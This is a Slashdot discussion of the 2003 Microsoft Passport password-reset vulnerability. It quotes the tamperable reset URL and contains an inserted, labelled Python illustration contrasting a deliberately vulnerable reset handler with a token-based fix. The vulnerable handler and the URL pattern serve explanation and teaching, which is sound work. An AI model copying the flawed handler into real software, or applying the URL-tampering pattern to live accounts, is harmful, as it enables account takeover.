    A: You're way off about changing peoples' approach. The sad fact is people like that are in pain-avoidance mode. Give them pain. Give them a productive way to avoid the pain. There must be code review. One guy does a little coding, another guy has to sign off on it. A third has to sign off that it has been tested (whether or not any testing actually happens is not important). All three get burned if anything bad happens: after-hours or weekend work to fix it NOW? The rate of code churn goes down, and the quality goes up. Grumbling goes up, but it sounds like a personal problem to me... :)

    B: You're dead-on-target about doing other people's work. You can't have individual effort and collective accountability. You have to have collective work and collective accountability. Oh, and if you're smarter than others: the sharpest knife always gets used the most. Adjust to it. One day you will be enlightened.

    C: You are dead-on-target about the financial sector :). That does not mean it won't work in hospitals or law offices though. It just means *somebody* has to fulfill the role of irate customer when the slackers need it.

    Culture is not something you create at the water cooler or in seminars. It is dictated by the unique combination of supply and demand wherever you are. You can change the supply (of people or other resources), or the demand. The boss/team-leader mediates customer demand and needs to have some real power over the programmers in the same way that customers have real power to affect the company's bottom line. If you lack accountability, that isn't a software development problem. You're just going to get shoddy results, software security, housekeeping, everything included.

    The moral of the story: accountability is security. So, if you want a culture of security, improve your accountability! It has positive potential for Maslow's "self-actualizer" types too.

    --
    --- Nothing clever here: move along now...
  125. Re:Probably Microsoft code is difficult to maintai by Stonan · · Score: 1

    Actually this makes perfect sense for a company that is designed for making money.

    You can't make money selling fully functional software or by releasing patches. You can make money selling newer versions of dysfunctional software.

    --
    The GEEK shall inherit the earth...
  126. != vulnerability by shiflett · · Score: 1

    That's not a vulnerability. That's just unaware (stupid?) users giving their username and password to the bad guys.

  127. Why not fix the most public and severe bugs? by Futurepower(R) · · Score: 1

    This theory would make sense, except that Internet Explorer's bugs are so public and severe that it would make sense to fix them, even if, overall, Microsoft's business model is to make money by delaying delivering a good product.

  128. Re:FUD by alienw · · Score: 1

    That's what they are doing, you moron. And yes, if you have an ISP, unplugging ethernet from the server is the first step of any fix. You should also turn off the power when you work on your house wiring. DUH!!

  129. Microsoft VP sells all. by Futurepower(R) · · Score: 1


    Very interesting links.

    Look at this: A Microsoft Group Vice President, Kevin R. Johnson, received 322,560 shares of stock 3 days ago and sold it that same day. He received 244,760 shares of stock on March 6, 2003 and sold that the same day.

    Does he know something normal investors don't? Isn't he indicating that he expects MS shares to go down?

    1. Re:Microsoft VP sells all. by IsaacW · · Score: 1

      Note that even after both of these sales he still owned around 5700 shares of Microsoft stock. The options, exercised at ~$6 and ~$7 per share represented a significant paper profit. Perhaps he wanted to realize that profit. If anything, what he knows that normal investors don't is a rather obvious and oft-ignored piece of investment knowledge: that keeping more than 5% of your total investment holdings in a single security is a bad idea, and he simply wanted to use the proceeds of the sales to diversify his holdings. I don't know, because I'm not him, but please don't go slinging around potential allegations of insider trading.

  130. Re:Probably Microsoft code is difficult to maintai by prnd_ndrd · · Score: 1

    I mean this as a serious question: I wonder how those numbers of bugs compare to an open source project like Mozilla, Konqueror, etc. Sometimes I think Microsoft, AOL, and other traditional "Bad Guys" are perceived as having crappy software simply because they are under more scrutiny (i.e. millions of eyeballs interacting with the programs daily).

    --
    Want to talk? ashaver AT pdx DOT edu
  131. Debate by floydman · · Score: 1

    There is always this debate about viruses and hacks always being available for M$ just because their SW is more widespread than *nix. Actually I totally disagree with this; I think they have a serious problem with their core engines, the basics or pilgrims they are standing upon are corrupt. The more they build over these corrupt basics, the wackier the output gets. They tend to fix the wacky stuff with no use, cause the core is not optimized or secure..

    /*When ur 1 of the few to land on ur feet, what would u do 2 make ends meet??!*/

    --
    The lunatic is in my head
  132. just checked my vulnerability... by generationxyu · · Score: 1

    look at this url: https://memberservices.passport.net/ppsecure/MSRV_ResetPW.srf?lc=1033&sf=1&id=2&ru=http://www.hotmail.msn.com/cgi-bin/sbox&tw=20&fs=1&cb=&cbid=24325&ts=0&sec=&mspp_shared=&seclog=0&kpp=2&svc=mail&msppjph=1&em=jameslongs@hotmail.com my favorite parts: &sec= &seclog=0 good to know they're still keeping track of possible exploits even as much as 12 hours after this has been discovered...

    --
    I mod down pyramid schemes in sigs.
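    The reset URL quoted above carries the target account (em=) as a browser-supplied parameter, which is the class of flaw the thread calls URL-tampering. As an added illustration, not code from the thread or from Microsoft, the following contrasts a reset handler that trusts such a parameter with one that honours only a server-issued, single-use, expiring token; the account store, addresses and 15-minute expiry policy are constructed for the example.

```python
import hashlib
import secrets
from typing import Dict, Optional, Tuple

TOKEN_TTL_SECONDS = 15 * 60  # assumed policy: reset links die after 15 minutes


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def _token_key(token: str) -> str:
    # Only a hash of the token is kept server-side, so a leaked table
    # cannot be replayed as live reset links.
    return hashlib.sha256(token.encode()).hexdigest()


class ResetService:
    """Constructed in-memory account store with two password-reset handlers."""

    def __init__(self) -> None:
        self.accounts: Dict[str, Tuple[bytes, bytes]] = {}   # email -> (salt, hash)
        self.pending: Dict[str, Tuple[str, float]] = {}      # token hash -> (email, expiry)

    def add_account(self, email: str, password: str) -> None:
        self._set_password(email, password)

    def check_password(self, email: str, password: str) -> bool:
        salt, stored = self.accounts[email]
        return secrets.compare_digest(stored, _hash_password(password, salt))

    def _set_password(self, email: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.accounts[email] = (salt, _hash_password(password, salt))

    # --- the flawed pattern ---------------------------------------------------
    def weak_reset(self, query: Dict[str, str], new_password: str) -> bool:
        """Schematic of the bug class: the account to reset is whatever the
        em= query parameter names. Nothing proves the caller controls that
        mailbox, so whoever edits the URL chooses the victim."""
        email = query.get("em", "")
        if email not in self.accounts:
            return False
        self._set_password(email, new_password)
        return True

    # --- the hardened flow ----------------------------------------------------
    def request_reset(self, email: str, now: float) -> Optional[str]:
        """Step 1: mint a random token bound server-side to the account, with
        an expiry. A real service e-mails it to the address on file; here it
        is returned so the caller can stand in for the mailbox."""
        if email not in self.accounts:
            return None  # a real handler answers identically, to avoid enumeration
        token = secrets.token_urlsafe(32)
        self.pending[_token_key(token)] = (email, now + TOKEN_TTL_SECONDS)
        return token

    def hardened_reset(self, query: Dict[str, str], new_password: str,
                       now: float) -> bool:
        """Step 2: the target account comes only from the server-side record
        the token points to; any em= in the URL is never consulted."""
        entry = self.pending.pop(_token_key(query.get("token", "")), None)  # single use
        if entry is None:
            return False
        email, expires_at = entry
        if now > expires_at:
            return False
        self._set_password(email, new_password)
        return True
```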
  133. And you thought... by Anonymous+Brave+Guy · · Score: 1
    or just go for abuse@hotmail.com.

    And you thought a slashdotting was a heavy load... ;-)

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  134. Don't worry too much by Anonymous+Brave+Guy · · Score: 1
    If Passport were being used for copyright protection, it would be a federal crime to report this security vulnerability.

    It might be a federal crime in the United States, but fortunately, most of the rest of the world has a smarter legal system. Or perhaps the US government plans to block all incoming traffic from outside, so no-one can read the EU- or Asian- or Australian-based news sites and see this for themselves...? :-)

    --
    If you disagree, post your argument. (-1, Overrated) isn't your personal censorship tool for views you don't like.
  135. Re:FUD by Lord+Sauron · · Score: 1

    > Does the word 'damage control' mean anything to you

    FYI, 'damage control' is not a word, but two.

  136. Re: Procedure to inform them it's broken. by DBMandrake · · Score: 1

    To install it, you either need to jumper the CPU down to a slower speed, or boot the computer in Safe mode, as the bug doesn't prevent booting in safe mode...

    Annoying, yes.

  137. Don't rest on your laurels by xixax · · Score: 1

    M$ has previously moved heaven and earth to do things when they were felt to be important. Look at their bloody minded efforts to turn around Internet.

    If M$ really commits to being secure, they will get much better at it. It just may take a while.

    Besides, all this lousy crud will merely serve to reinforce how good and essential Palladium is.

    (though I do wonder how Palladium will be able to tell a worm running in a poorly written app from a legit process)

    Xix.

    --
    "Everything is adjustable, provided you have the right tools"
  138. Re: Procedure to inform them it's broken. by mcrbids · · Score: 1

    Yes, I remember that bug. Funny, 'cause you could usually get Windows to load into safe mode, but you still couldn't install the patch.

    The only thing I ever found that worked was to slow the processor down to 266 MHz, install the patch, then clock it back up again.

    This was for Win95x on AMD K6-2 systems.

    --
    I have no problem with your religion until you decide it's reason to deprive others of the truth.
  139. His vote is that Microsoft stock will not go up. by Futurepower(R) · · Score: 1

    I am certainly NOT saying that he is doing anything illegal. I am only saying that by selling 567,000 shares of Microsoft stock, and keeping only 5,700 shares, he is indicating, loud and clear, that he has no strong idea that Microsoft stock will go up. Presumably, he would rather have more money than less. If he had a good idea that Microsoft stock would go up, he would have kept more shares, even if he wanted to diversify.

  140. I wonder about this too. by Futurepower(R) · · Score: 1


    I wonder about this too.

    I notice that Opera is listed as having 3 security vulnerabilities in the pivx.com link above. However, Opera's history is that the security vulnerabilities get fixed quickly.

    I found a serious bug (204668) in a recent build of Mozilla (a stack overflow, not a security vulnerability), reported it using Mozilla Bugzilla, and they fixed it within a day.

    I complained of another bug in Mozilla, and they had an answer in two hours. Those Mozilla people are seriously interested in getting the job done.

    Maybe the world only has the intellectual resources to produce one or two good browsers.

  141. Both rate and volume increasing by SgtChaireBourne · · Score: 1
    Both the frequency and volume of sales are increasing: They're all selling as fast as they get.

    People, including CEOs, may not understand or wish to understand "IT" so it is easy to bullshit them. In contrast, nearly everyone understands money. So it's no surprise that, as the FTC is fixing to knock them in the head, there are many who see the club descending. If the FTC doesn't finish them, then losing monopoly rents will. It may drag out in the courts and ad campaigns a bit to give time for counting coup.

    --
    Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
  142. Correction! by @madeus · · Score: 1

    Just noticed - I spent 3 *months* doing the planning (not 3 years, as it appears, must have deleted the word 'months') oops.

  143. Re: Procedure to inform them it's broken. by NickFitz · · Score: 1

    Yup, in the end I had to drop the processor down to 250, patch, and bump it up again.

    It reminded me of the time someone posted to a Netscape newsgroup wanting a JavaScript snippet that could determine whether JavaScript was enabled or not. Even better, someone posted a reply. Of course, it only worked if JS was enabled :-)

    --
    Using HTML in email is like putting sound effects on your phone calls. Just say <strong>no</strong>.
  144. Re:FUD by N3WBI3 · · Score: 1
    Unplugging the computer is the first thing you should do, yes; what the hell do you think "Now its the right thing to do (make sure nobody can change **until** you have it fixed.." means, you mental midget. But unplugging the server is not fixing the problem, it's making sure nobody exploits the problem; a fix is a steady state solution.

    Now if you want to actually read and not have a knee-jerk reaction, I'll put it in terms even a 3rd grader like you could understand. They did the right thing by killing the service asap, but that does not fix the problem.

    --
  145. Re:I have to go piss on Tsarkon.... by AlphaSys · · Score: 1

    Oh, Tsarkon, my hero... I was so blind.

    Seriously, though. I thought you'd given up on me. Thank God I was mistaken. It's so cute how you put your utterly baseless arguments and assumptions as to my intelligence, attitude, aptitude and skill in one AC post and your vain libel in another in the attempt to appear as two separate ACs. Truth told, you don't really even constitute a half poster, much less more than one.

    Nice to know that I can put some bait out there and get you to waste some time in reply. The difference is I can troll you and still provide decent enough conversation/info to be worth something to the whole discussion.

    No, I don't profess to be a coder. I went into systems to avoid any coding that requires thinking above the scripting level. That's just it. I'm amazed that some folks who base their entire livelihood on their ability to design and implement applications have so little a clue of how to do it.

    You imply your own system architecture understanding and application design skillz are at least competent by attempting to impugn mine. Well, then you should think a little harder, buggar. Just creating an SSL session to keep your info safe on the wire doesn't begin to mitigate the problem with this exploit (um, geez, that's such an official word for what in this case boils down to URL-tampering... I thought enough work went into web app design today that URL-tampering was an extinct attack vector). That was my whole point earlier. Any idiot who can examine the hyperlink can imagine the attack method, So just observing normal operation within the app itself is enough to figure out that this is wider open than your pouting rictus in the proximity of the PFY.

    You want code samples? There's nothing I do in any of my code that isn't easily derived from a five-minute google for whatever it is you're trying to do. You want some enlightening secrets about the super-secret world of locking down a server? Sorry, all I have is what's freely available from the usual sources, you know, bugtraq, the NSA, honeynet discussion lists, etc. No magic bullets. You caught me. What a fraud I've perpetrated.

    I don't know where you get off trying to paint me as some kind of Steve Gibson or the like, but it sure is funny to watch you fail at cogent sentience in the process. I swear, when you get all worked up, it's like watching de-volution at work. Are we not men? The difference between your motivation and mine for carrying on this conversation is this... You do it just to antagonize me, but I actually believe there is hope for you one day to look at something more open-mindedly than you currently do. You egg me on because you believe my kind will never change. I reply because I retain hope that yours one day will. That's the beauty in the Dawn of Man... it happens every day somewhere. And once it happens to you, you can make it happen over and over for others.

    --
    Can I bum a sig? I left mine at the office.
  146. It just keeps getting better and better... by onlyabill · · Score: 1

    May 08, Associated Press Microsoft admits Passport was vulnerable. Computer researcher Muhammad Faisal Rauf Danka of Pakistan discovered how to breach Microsoft Corp.'s security procedures for its Internet Passport service. The service is designed to protect customers visiting some retail Web sites, sending e-mails and in some cases making credit-card purchases. Microsoft acknowledged the flaw affected all its 200 million Passport accounts but said it fixed the problem early Thursday, after details were published on the Internet Wednesday night. Under a settlement with the Federal Trade Commission (FTC) last year over lapsed Passport security, Microsoft pledged to take reasonable safeguards to protect personal consumer information during the next two decades or risk fines up to $11,000 per violation. The FTC's Jessica Rich said Thursday that each vulnerable account could constitute a separate violation - raising the maximum fine that could be assessed against Microsoft to $2.2 trillion. Source: http://www.washingtonpost.com/wp-dyn/articles/A30330-2003May8.html

    --
    I have to use this cause I can't afford a real sig...
    1. Re:It just keeps getting better and better... by geoswan · · Score: 1
      2.2 trillion! Sure throw the book at them...

      Somebody mod this up...

      Also reported in the RISKS digest.

  147. Re:... piss off there little butker :o) by AlphaSys · · Score: 1

    I'm not sure I get your point, fwad. That was exactly the point of my first post, so what's your argument with me, regurgitator? And I never said I "figured out" anything. I said some developers have to be bitch-slapped to stop doing it. Others have to be bitch-slapped for other various reasons, but I'm sure you can cite a list from personal experience far longer than any I can imagine. Four replies to a single post.... must've struck a nerve.

    Oh one more thing, to answer your question... I work with...
    ...
    YOUR MOTHER!

    --
    Can I bum a sig? I left mine at the office.
  148. Bad Publicity is starting... AP story by jeffsenter · · Score: 1

    The NYTimes is carrying the AP story. It starts "Microsoft acknowledged a security flaw Thursday in its popular Internet Passport service that left 200 million consumer accounts vulnerable to hackers and thieves -- an admission that could expose the company to a hefty fine from U.S. regulators."